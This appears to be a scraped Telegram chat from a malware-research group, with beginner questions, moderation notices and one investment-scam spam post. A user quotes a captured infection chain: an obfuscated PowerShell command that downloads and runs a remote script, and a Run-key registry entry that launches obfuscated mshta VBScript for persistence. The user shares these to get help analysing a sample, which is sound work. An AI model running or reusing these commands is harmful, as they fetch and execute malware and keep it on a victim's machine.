Group for Malware Analysts. Pinned message with resources and rules: https://t.me/MalwareResearch/38033
"I was able to analyze the part where it downloads and compiles C# code, but I couldn't manage the part after that."
Читать полностью…Can’t get things which is c# want download from c2
Читать полностью…But that's just the beginning. After understanding it, what is it that you want to do with the information is the next question...
You can research into a lot of things, but that path should lead to something that you want?
Give this a shot, also try to just straight up 7z the pe.
Читать полностью…Hi Researcher , can unpack malware whose use exe4j to pack itself?
Читать полностью…As a platform i would suggest Google, as a roadmap i suggest the pinned message, for exploits or data leak i suggest getting employed by NSA
Читать полностью…l just want to say I'm really enjoying being
part of your investment platform passively
income every week
/channel/+9lrfRO1a5lVjZDQ0
User onionMan has 1/3 warnings; be careful!
Reason:
check @dfirjobs ibstead
Hello @Bogi05, welcome to the Malware Research group! Please read the pinned message before you post!
Читать полностью…Sam:
All starts with this commands
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (&NeW-oBjeCt NEt.webClIeNT).doWnLoaDstRInG('[httP://]sToRKa.sTORe/Ps/06fCC253-fD2C-5a52-6f46-a0B42e64251c')|CMd
Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "_06fcc253fd2c5a526f46a0b42e64251c" /t REG_SZ /F /D "mShta VbscRiPt:closE(execUTe(\"cr\"+\"eAt\"+\"eO\"+\"Bj\"+\"ect\"+\"(\"\"\"+\"WS\"+\"CRI\"+\"pt\"+\".Sh\"+\"ELl\"+\"\"\").\"+\"Run\"+\" \"\"\"+\"%_\"+\"06\"+\"FC\"+\"C25\"+\"3F\"+\"D2\"+\"C5\"+\"a5\"+\"26\"+\"F4\"+\"6a\"+\"0B4\"+\"2e\"+\"642\"+\"51c\"+\"%\"\",\"+\"0\"))"
I still don't get where the question is leading to
So you want a sample? Or know what kind of malware exhibits this behaviour? Or if you can detect such behaviour?
All starts with one script , it’s connect to c2 server gets powershell scripts then runing it, then downloads another c# code , doing compail then c# code starts downloading another tool, I need research this malware
Читать полностью…I think if you input that into Google, you are going to get tons of definitions and common execution methods
Читать полностью…No... I don't understand, and Google isn't helping
Читать полностью…Hello @nguyen_duyhung, welcome to the Malware Research group! Please read the pinned message before you post!
Читать полностью…New FedBan
Fed: Libra's Empire
FedAdmin: ❤🦦
User: Александр
User ID: 1351806164
Reason: scam
Hello everyone, can someone tell me how to create a strong basic on malwares? Which platforms I should us to research and what should be my roadmap? Also in which channels I can get the exploits or imidiate data leak news?
Читать полностью…hi guys , i am new here so just wanted to introduce myself😊
Читать полностью…Yes, but I don't have an enterprise and not enough information to write stigma rules. Thanks.
Читать полностью…